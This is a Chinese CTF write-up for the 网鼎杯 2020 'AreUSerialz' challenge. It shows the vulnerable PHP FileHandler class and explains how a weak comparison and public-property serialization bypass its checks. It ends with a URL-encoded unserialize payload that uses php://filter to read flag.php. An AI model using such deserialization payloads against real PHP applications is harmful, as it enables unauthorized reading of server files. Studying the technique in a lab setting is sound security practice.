[网鼎杯 2020 青龙组]AreUSerialz

题目链接：[网鼎杯 2020 青龙组]AreUSerialz。

打开后，环境如下所示。

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

可以看到，这道题是一道反序列化题。

在题目中，存在两处检测：

1. 通过阅读源码可知，当 "op" 设置为 2 时，即”读“模式，虽然在反序列化调用的 __destruct 函数中，对 "op" 进行了检测，但是在 process 函数处，代码：else if($this->op == "2") 中又使用了弱类型比较。因此，可以直接在序列化时将 op 设置为 2，这样即可绕过检测。

2. 通过阅读源码可知，存在 is_valid 函数，会对用户传入的 $_GET['str'] 进行检测，因此在 "protected" 类型的变量反序列时生成的 %00 字符会被检测到，但此处存在漏洞。即，个别版本 PHP 对属性类型不敏感（PHP 7.1+ 版本对属性类型不敏感，本地序列化属性改为 public 的话，与远程服务器属性为 protected 的可兼容），因此，在反序列化时，可以反序列化 public 类型的变量，从而绕过检测。

最终，在读文件时，利用伪协议，读取 flag.php 源码即可。

Payload：?str=O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A71%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fvar%2Fwww%2Fhtml%2Fflag.php%22%3Bs%3A7%3A%22content%22%3Bs%3A12%3A%22Hello+World%21%22%3B%7D。